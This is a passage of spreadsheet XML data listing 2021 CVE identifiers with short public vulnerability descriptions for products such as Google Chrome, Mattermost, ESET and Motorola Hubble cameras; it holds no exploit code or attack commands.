    <t>CVE-2021-37833</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands.</t>
  </si>
  <si>
    <t>CVE-2021-37839</t>
  </si>
  <si>
    <t>Apache Superset up to 1.5.1 allowed for authenticated users to access metadata information related to datasets they have no permission on. This metadata included the dataset name, columns and metrics.</t>
  </si>
  <si>
    <t>CVE-2021-37840</t>
  </si>
  <si>
    <t>aaPanel through 6.8.12 allows Cross-Site WebSocket Hijacking (CSWH) involving OS commands within WebSocket messages at a ws:// URL for /webssh (the victim must have configured Terminal with at least one host). Successful exploitation depends on the browser used by a potential victim (e.g., exploitation can occur with Firefox but not Chrome).</t>
  </si>
  <si>
    <t>CVE-2021-37841</t>
  </si>
  <si>
    <t>Docker Desktop before 3.6.0 suffers from incorrect access control. If a low-privileged account is able to access the server running the Windows containers, it can lead to a full container compromise in both process isolation and Hyper-V isolation modes. This security issue leads an attacker with low privilege to read, write and possibly even execute code inside the containers.</t>
  </si>
  <si>
    <t>CVE-2021-37842</t>
  </si>
  <si>
    <t>metakv in Couchbase Server 7.0.0 uses Cleartext for Storage of Sensitive Information. Remote Cluster XDCR credentials can get leaked in debug logs. Config key tombstone purging was added in Couchbase Server 7.0.0. This issue happens when a config key, which is being logged, has a tombstone purger time-stamp attached to it.</t>
  </si>
  <si>
    <t>CVE-2021-37843</t>
  </si>
  <si>
    <t>The resolution SAML SSO apps for Atlassian products allow a remote attacker to login to a user account when only the username is known (i.e., no other authentication is provided). The fixed versions are for Jira: 3.6.6.1, 4.0.12, 5.0.5; for Confluence 3.6.6, 4.0.12, 5.0.5; for Bitbucket 2.5.9, 3.6.6, 4.0.12, 5.0.5; for Bamboo 2.5.9, 3.6.6, 4.0.12, 5.0.5; and for Fisheye 2.5.9.</t>
  </si>
  <si>
    <t>CVE-2021-37847</t>
  </si>
  <si>
    <t>crypto/digest.c in Pengutronix barebox through 2021.07.0 leaks timing information because memcmp is used during digest verification.</t>
  </si>
  <si>
    <t>CVE-2021-37848</t>
  </si>
  <si>
    <t>common/password.c in Pengutronix barebox through 2021.07.0 leaks timing information because strncmp is used during hash comparison.</t>
  </si>
  <si>
    <t>CVE-2021-3785</t>
  </si>
  <si>
    <t>CVE-2021-37850</t>
  </si>
  <si>
    <t>ESET was made aware of a vulnerability in its consumer and business products for macOS that enables a user logged on to the system to stop the ESET daemon, effectively disabling the protection of the ESET security product until a system reboot.</t>
  </si>
  <si>
    <t>CVE-2021-37851</t>
  </si>
  <si>
    <t>Local privilege escalation in Windows products of ESET allows user who is logged into the system to exploit repair feature of the installer to run malicious code with higher privileges. This issue affects: ESET, spol. s r.o. ESET NOD32 Antivirus 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Internet Security 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Smart Security Premium 11.2 versions prior to 15.1.12.0. ESET, spol. s r.o. ESET Endpoint Antivirus 6.0 versions prior to 9.0.2046.0; 6.0 versions prior to 8.1.2050.0; 6.0 versions prior to 8.0.2053.0. ESET, spol. s r.o. ESET Endpoint Security 6.0 versions prior to 9.0.2046.0; 6.0 versions prior to 8.1.2050.0; 6.0 versions prior to 8.0.2053.0. ESET, spol. s r.o. ESET Server Security for Microsoft Windows Server 8.0 versions prior to 9.0.12012.0. ESET, spol. s r.o. ESET File Security for Microsoft Windows Server 8.0.12013.0. ESET, spol. s r.o. ESET Mail Security for Microsoft Exchange Server 6.0 versions prior to 8.0.10020.0. ESET, spol. s r.o. ESET Mail Security for IBM Domino 6.0 versions prior to 8.0.14011.0. ESET, spol. s r.o. ESET Security for Microsoft SharePoint Server 6.0 versions prior to 8.0.15009.0.</t>
  </si>
  <si>
    <t>CVE-2021-37852</t>
  </si>
  <si>
    <t>ESET products for Windows allows untrusted process to impersonate the client of a pipe, which can be leveraged by attacker to escalate privileges in the context of NT AUTHORITY\SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2021-37859</t>
  </si>
  <si>
    <t>Fixed a bypass for a reflected cross-site scripting vulnerability affecting OAuth-enabled instances of Mattermost.</t>
  </si>
  <si>
    <t>CVE-2021-3786</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used in CSME configuration of some Lenovo Notebook and ThinkPad systems could be used to leak out data out of the SMRAM range.</t>
  </si>
  <si>
    <t>CVE-2021-37860</t>
  </si>
  <si>
    <t>Mattermost 5.38 and earlier fails to sufficiently sanitize clipboard contents, which allows a user-assisted attacker to inject arbitrary web script in product deployments that explicitly disable the default CSP.</t>
  </si>
  <si>
    <t>CVE-2021-37861</t>
  </si>
  <si>
    <t>Mattermost 6.0.2 and earlier fails to sufficiently sanitize user's password in audit logs when user creation fails.</t>
  </si>
  <si>
    <t>CVE-2021-37862</t>
  </si>
  <si>
    <t>Mattermost 6.0 and earlier fails to sufficiently validate the email address during registration, which allows attackers to trick users into signing up using attacker-controlled email addresses via crafted invitation token.</t>
  </si>
  <si>
    <t>CVE-2021-37863</t>
  </si>
  <si>
    <t>Mattermost 6.0 and earlier fails to sufficiently validate parameters during post creation, which allows authenticated attackers to cause a client-side crash of the web application via a maliciously crafted post.</t>
  </si>
  <si>
    <t>CVE-2021-37864</t>
  </si>
  <si>
    <t>Mattermost 6.1 and earlier fails to sufficiently validate permissions while viewing archived channels, which allows authenticated users to view contents of archived channels even when this is denied by system administrators by directly accessing the APIs.</t>
  </si>
  <si>
    <t>CVE-2021-37865</t>
  </si>
  <si>
    <t>Mattermost 6.2 and earlier fails to sufficiently process a specifically crafted GIF file when it is uploaded while drafting a post, which allows authenticated users to cause resource exhaustion while processing the file, resulting in server-side Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2021-37866</t>
  </si>
  <si>
    <t>Mattermost Boards plugin v0.10.0 and earlier fails to invalidate a session on the server-side when a user logged out of Boards, which allows an attacker to reuse old session token for authorization.</t>
  </si>
  <si>
    <t>CVE-2021-37867</t>
  </si>
  <si>
    <t>Mattermost Boards plugin v0.10.0 and earlier fails to protect email addresses of all users via one of the Boards APIs, which allows authenticated and unauthorized users to access this information resulting in sensitive &amp; private information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-3787</t>
  </si>
  <si>
    <t>A vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker with local access to obtain the MQTT credentials that could result in unauthorized access to backend Hubble services.</t>
  </si>
  <si>
    <t>CVE-2021-3788</t>
  </si>
  <si>
    <t>An exposed debug interface was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker with physical access unauthorized access to the device.</t>
  </si>
  <si>
    <t>CVE-2021-3789</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker with physical access to obtain the encryption key used to decrypt firmware update packages.</t>
  </si>
  <si>
    <t>CVE-2021-3790</t>
  </si>
  <si>
    <t>A buffer overflow was reported in the local web server of some Motorola-branded Binatone Hubble Cameras that could allow an unauthenticated attacker on the same network to perform a denial-of-service attack against the device.</t>
  </si>
  <si>
    <t>CVE-2021-37909</t>
  </si>
  <si>
    <t>WriteRegistry function in TSSServiSign component does not filter and verify users’ input, remote attackers can rewrite to the registry without permissions thus perform hijack attacks to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-3791</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an unauthenticated attacker on the same subnet to download an encrypted log file containing sensitive information such as WiFi SSID and password.</t>
  </si>
  <si>
    <t>CVE-2021-37910</t>
  </si>
  <si>
    <t>ASUS routers Wi-Fi protected access protocol (WPA2 and WPA3-SAE) has improper control of Interaction frequency vulnerability, an unauthenticated attacker can remotely disconnect other users' connections by sending specially crafted SAE authentication frames.</t>
  </si>
  <si>
    <t>CVE-2021-37911</t>
  </si>
  <si>
    <t>The management interface of BenQ smart wireless conference projector does not properly control user's privilege. Attackers can access any system directory of this device through the interface and execute arbitrary commands if he enters the local subnetwork.</t>
  </si>
  <si>
    <t>CVE-2021-37912</t>
  </si>
  <si>
    <t>The HGiga OAKlouds mobile portal does not filter special characters of the Ethernet number parameter of the network interface card setting page. Remote attackers can use this vulnerability to perform command injection and execute arbitrary commands in the system without logging in.</t>
  </si>
  <si>
    <t>CVE-2021-37913</t>
  </si>
  <si>
    <t>The HGiga OAKlouds mobile portal does not filter special characters of the IPv6 Gateway parameter of the network interface card setting page. Remote attackers can use this vulnerability to perform command injection and execute arbitrary commands in the system without logging in.</t>
  </si>
  <si>
    <t>CVE-2021-37914</t>
  </si>
  <si>
    <t>In Argo Workflows through 3.1.3, if EXPRESSION_TEMPLATES is enabled and untrusted users are allowed to specify input parameters when running workflows, an attacker may be able to disrupt a workflow because expression template output is evaluated.</t>
  </si>
  <si>
    <t>CVE-2021-37915</t>
  </si>
  <si>
    <t>An issue was discovered on the Grandstream HT801 Analog Telephone Adaptor before 1.0.29.8. From the limited configuration shell, it is possible to set the malicious gdb_debug_server variable. As a result, after a reboot, the device downloads and executes malicious scripts from an attacker-defined host.</t>
  </si>
  <si>
    <t>CVE-2021-37916</t>
  </si>
  <si>
    <t>Joplin before 2.0.9 allows XSS via button and form in the note body.</t>
  </si>
  <si>
    <t>CVE-2021-37918</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior allows unrestricted file upload which leads to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-37919</t>
  </si>
  <si>
    <t>CVE-2021-3792</t>
  </si>
  <si>
    <t>Some device communications in some Motorola-branded Binatone Hubble Cameras with backend Hubble services are not encrypted which could lead to the communication channel being accessible by an attacker.</t>
  </si>
  <si>
    <t>CVE-2021-37920</t>
  </si>
  <si>
    <t>CVE-2021-37921</t>
  </si>
  <si>
    <t>CVE-2021-37922</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior is vulnerable to path traversal which allows copying of files from one directory to another.</t>
  </si>
  <si>
    <t>CVE-2021-37923</t>
  </si>
  <si>
    <t>CVE-2021-37924</t>
  </si>
  <si>
    <t>CVE-2021-37925</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior has a Post-Auth OS command injection vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37926</t>
  </si>
  <si>
    <t>CVE-2021-37927</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus version 7110 and prior allows account takeover via SSO.</t>
  </si>
  <si>
    <t>CVE-2021-37928</t>
  </si>
  <si>
    <t>CVE-2021-37929</t>
  </si>
  <si>
    <t>CVE-2021-3793</t>
  </si>
  <si>
    <t>An improper access control vulnerability was reported in some Motorola-branded Binatone Hubble Cameras which could allow an unauthenticated attacker on the same network as the device to access administrative pages that could result in information disclosure or device firmware update with verified firmware.</t>
  </si>
  <si>
    <t>CVE-2021-37930</t>
  </si>
  <si>
    <t>CVE-2021-37931</t>
  </si>
  <si>
    <t>CVE-2021-37933</t>
  </si>
  <si>
    <t>An LDAP injection vulnerability in /account/login in Huntflow Enterprise before 3.10.6 could allow an unauthenticated, remote user to modify the logic of an LDAP query and bypass authentication. The vulnerability is due to insufficient server-side validation of the email parameter before using it to construct LDAP queries. An attacker could bypass authentication exploiting this vulnerability by sending login attempts in which there is a valid password but a wildcard character in email parameter.</t>
  </si>
  <si>
    <t>CVE-2021-37934</t>
  </si>
  <si>
    <t>Due to insufficient server-side login-attempt limit enforcement, a vulnerability in /account/login in Huntflow Enterprise before 3.10.14 could allow an unauthenticated, remote user to perform multiple login attempts for brute-force password guessing.</t>
  </si>
  <si>
    <t>CVE-2021-37935</t>
  </si>
  <si>
    <t>An information disclosure vulnerability in the login page of Huntflow Enterprise before 3.10.4 could allow an unauthenticated, remote user to get information about the domain name of the configured LDAP server. An attacker could exploit this vulnerability by requesting the login page and searching for the "isLdap" JavaScript parameter in the HTML source code.</t>
  </si>
  <si>
    <t>CVE-2021-37936</t>
  </si>
  <si>
    <t>It was discovered that Kibana was not sanitizing document fields containing HTML snippets. Using this vulnerability, an attacker with the ability to write documents to an elasticsearch index could inject HTML. When the Discover app highlighted a search term containing the HTML, it would be rendered for the user.</t>
  </si>
  <si>
    <t>CVE-2021-37938</t>
  </si>
  <si>
    <t>It was discovered that on Windows operating systems specifically, Kibana was not validating a user supplied path, which would load .pbf files. Because of this, a malicious user could arbitrarily traverse the Kibana host to load internal files ending in the .pbf extension. Thanks to Dominic Couture for finding this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-37939</t>
  </si>
  <si>
    <t>It was discovered that Kibana’s JIRA connector &amp; IBM Resilient connector could be used to return HTTP response data on internal hosts, which may be intentionally hidden from public view. Using this vulnerability, a malicious user with the ability to create connectors, could utilize these connectors to view limited HTTP response data on hosts accessible to the cluster.</t>
  </si>
  <si>
    <t>CVE-2021-3794</t>
  </si>
  <si>
    <t>vuelidate is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-37940</t>
  </si>
  <si>
    <t>An information disclosure via GET request server-side request forgery vulnerability was discovered with the Workplace Search Github Enterprise Server integration. Using this vulnerability, a malicious Workplace Search admin could use the GHES integration to view hosts that might not be publicly accessible.</t>
  </si>
  <si>
    <t>CVE-2021-37941</t>
  </si>
  <si>
    <t>A local privilege escalation issue was found with the APM Java agent, where a user on the system could attach a malicious file to an application running with the APM Java agent. Using this vector, a malicious or compromised user account could use the agent to run commands at a higher level of permissions than they possess. This vulnerability affects users that have set up the agent via the attacher cli 3, the attach API 2, as well as users that have enabled the profiling_inferred_spans_enabled option</t>
  </si>
  <si>
    <t>CVE-2021-3795</t>
  </si>
  <si>
    <t>semver-regex is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-37956</t>
  </si>
  <si>
    <t>Use after free in Offline use in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37957</t>
  </si>
  <si>
    <t>Use after free in WebGPU in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37958</t>
  </si>
  <si>
    <t>Inappropriate implementation in Navigation in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to inject scripts or HTML into a privileged page via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37959</t>
  </si>
  <si>
    <t>Use after free in Task Manager in Google Chrome prior to 94.0.4606.54 allowed an attacker who convinced a user to enage in a series of user gestures to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3796</t>
  </si>
  <si>
    <t>vim is vulnerable to Use After Free</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2021-37961</t>
  </si>
  <si>
    <t>Use after free in Tab Strip in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37962</t>
  </si>
  <si>
    <t>Use after free in Performance Manager in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37963</t>
  </si>
  <si>
    <t>Side-channel information leakage in DevTools in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37964</t>
  </si>
  <si>
    <t>Inappropriate implementation in ChromeOS Networking in Google Chrome on ChromeOS prior to 94.0.4606.54 allowed an attacker with a rogue wireless access point to to potentially carryout a wifi impersonation attack via a crafted ONC file.</t>
  </si>
  <si>
    <t>CVE-2021-37965</t>
  </si>
  <si>
    <t>Inappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37966</t>
  </si>
  <si>
    <t>Inappropriate implementation in Compositing in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37967</t>
  </si>
  <si>
    <t>Inappropriate implementation in Background Fetch API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37968</t>
  </si>
  <si>
    <t>CVE-2021-37969</t>
  </si>
  <si>
    <t>Inappropriate implementation in Google Updater in Google Chrome on Windows prior to 94.0.4606.54 allowed a remote attacker to perform local privilege escalation via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3797</t>
  </si>
  <si>
    <t>hestiacp is vulnerable to Use of Wrong Operator in String Comparison</t>
  </si>
  <si>
    <t>CVE-2021-37970</t>
  </si>
  <si>
    <t>Use after free in File System API in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37971</t>
  </si>
  <si>
    <t>Incorrect security UI in Web Browser UI in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37972</t>
  </si>
  <si>
    <t>Out of bounds read in libjpeg-turbo in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37973</t>
  </si>
  <si>
    <t>Use after free in Portals in Google Chrome prior to 94.0.4606.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37974</t>
  </si>
  <si>
    <t>Use after free in Safebrowsing in Google Chrome prior to 94.0.4606.71 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37975</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37976</t>
  </si>
  <si>
    <t>Inappropriate implementation in Memory in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37977</t>
  </si>
  <si>
    <t>Use after free in Garbage Collection in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37978</t>
  </si>
  <si>
    <t>Heap buffer overflow in Blink in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37979</t>
  </si>
  <si>
    <t>heap buffer overflow in WebRTC in Google Chrome prior to 94.0.4606.81 allowed a remote attacker who convinced a user to browse to a malicious website to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3798</t>
  </si>
  <si>
    <t>A flaw was found in openCryptoki. The openCryptoki Soft token does not check if an EC key is valid when an EC key is created via C_CreateObject, nor when C_DeriveKey is used with ECDH public data. This may allow a malicious user to extract the private key by performing an invalid curve attack.</t>
  </si>
  <si>
    <t>CVE-2021-37980</t>
  </si>
  <si>
    <t>Inappropriate implementation in Sandbox in Google Chrome prior to 94.0.4606.81 allowed a remote attacker to potentially bypass site isolation via Windows.</t>
  </si>
  <si>
    <t>CVE-2021-37981</t>
  </si>
  <si>
    <t>Heap buffer overflow in Skia in Google Chrome prior to 95.0.4638.54 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37982</t>
  </si>
  <si>
    <t>Use after free in Incognito in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37983</t>
  </si>
  <si>
    <t>Use after free in Dev Tools in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37984</t>
  </si>
  <si>
    <t>Heap buffer overflow in PDFium in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37985</t>
  </si>
  <si>
    <t>Use after free in V8 in Google Chrome prior to 95.0.4638.54 allowed a remote attacker who had convinced a user to allow for connection to debugger to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37986</t>
  </si>
  <si>
    <t>Heap buffer overflow in Settings in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to engage with Dev Tools to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37987</t>
  </si>
  <si>
    <t>Use after free in Network APIs in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37988</t>
  </si>
  <si>
    <t>Use after free in Profiles in Google Chrome prior to 95.0.4638.54 allowed a remote attacker who convinced a user to engage in specific gestures to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37989</t>
  </si>
  <si>
    <t>Inappropriate implementation in Blink in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to abuse content security policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3799</t>
  </si>
  <si>
    <t>grav-plugin-admin is vulnerable to Improper Restriction of Rendered UI Layers or Frames</t>
  </si>
  <si>
    <t>CVE-2021-37990</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebView in Google Chrome on Android prior to 95.0.4638.54 allowed a remote attacker to leak cross-origin data via a crafted app.</t>
  </si>
  <si>
    <t>CVE-2021-37991</t>
  </si>
  <si>
    <t>Race in V8 in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37992</t>
  </si>
  <si>
    <t>Out of bounds read in WebAudio in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37993</t>
  </si>
  <si>
    <t>Use after free in PDF Accessibility in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37994</t>
  </si>
  <si>
    <t>Inappropriate implementation in iFrame Sandbox in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37995</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebApp Installer in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to potentially overlay and spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37996</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input Downloads in Google Chrome prior to 95.0.4638.54 allowed a remote attacker to bypass navigation restrictions via a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-37997</t>
  </si>
  <si>
    <t>Use after free in Sign-In in Google Chrome prior to 95.0.4638.69 allowed a remote attacker who convinced a user to sign into Chrome to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37998</t>
  </si>
  <si>
    <t>Use after free in Garbage Collection in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-37999</t>
  </si>
  <si>
    <t>Insufficient data validation in New Tab Page in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to inject arbitrary scripts or HTML in a new browser tab via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3800</t>
  </si>
  <si>
    <t>A flaw was found in glib before version 2.63.6. Due to random charset alias, pkexec can leak content from files owned by privileged users to unprivileged ones under the right condition.</t>
  </si>
  <si>
    <t>CVE-2021-38000</t>
  </si>
  <si>
    <t>Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 95.0.4638.69 allowed a remote attacker to arbitrarily browser to a malicious URL via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38001</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38002</t>
  </si>
  <si>
    <t>Use after free in Web Transport in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38003</t>
  </si>
  <si>
    <t>Inappropriate implementation in V8 in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38004</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in Autofill in Google Chrome prior to 95.0.4638.69 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38005</t>
  </si>
  <si>
    <t>Use after free in loader in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38006</t>
  </si>
  <si>
    <t>Use after free in storage foundation in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38007</t>
  </si>
  <si>
    <t>Type confusion in V8 in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38008</t>
  </si>
  <si>
    <t>Use after free in media in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38009</t>
  </si>
  <si>
    <t>Inappropriate implementation in cache in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3801</t>
  </si>
  <si>
    <t>prism is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-38010</t>
  </si>
  <si>
    <t>Inappropriate implementation in service workers in Google Chrome prior to 96.0.4664.45 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38011</t>
  </si>
  <si>
    <t>CVE-2021-38012</t>
  </si>
  <si>
    <t>CVE-2021-38013</t>
  </si>
  <si>
    <t>Heap buffer overflow in fingerprint recognition in Google Chrome on ChromeOS prior to 96.0.4664.45 allowed a remote attacker who had compromised a WebUI renderer process to potentially perform a sandbox escape via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38014</t>
  </si>
  <si>
    <t>Out of bounds write in Swiftshader in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38015</t>
  </si>
  <si>
    <t>Inappropriate implementation in input in Google Chrome prior to 96.0.4664.45 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension.</t>
  </si>
  <si>
    <t>CVE-2021-38016</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in background fetch in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to bypass same origin policy via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38017</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in iframe sandbox in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38018</t>
  </si>
  <si>
    <t>Inappropriate implementation in navigation in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to perform domain spoofing via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38019</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in CORS in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3802</t>
  </si>
  <si>
    <t>A vulnerability found in udisks2. This flaw allows an attacker to input a specially crafted image file/USB leading to kernel panic. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-38020</t>
  </si>
  <si>
    <t>Insufficient policy enforcement in contacts picker in Google Chrome on Android prior to 96.0.4664.45 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38021</t>
  </si>
  <si>
    <t>Inappropriate implementation in referrer in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-38022</t>
  </si>
  <si>
    <t>Inappropriate implementation in WebAuthentication in Google Chrome prior to 96.0.4664.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-3803</t>
  </si>
  <si>
    <t>nth-check is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-3804</t>
  </si>
  <si>
    <t>taro is vulnerable to Inefficient Regular Expression Complexity</t>
  </si>
  <si>
    <t>CVE-2021-3805</t>
  </si>
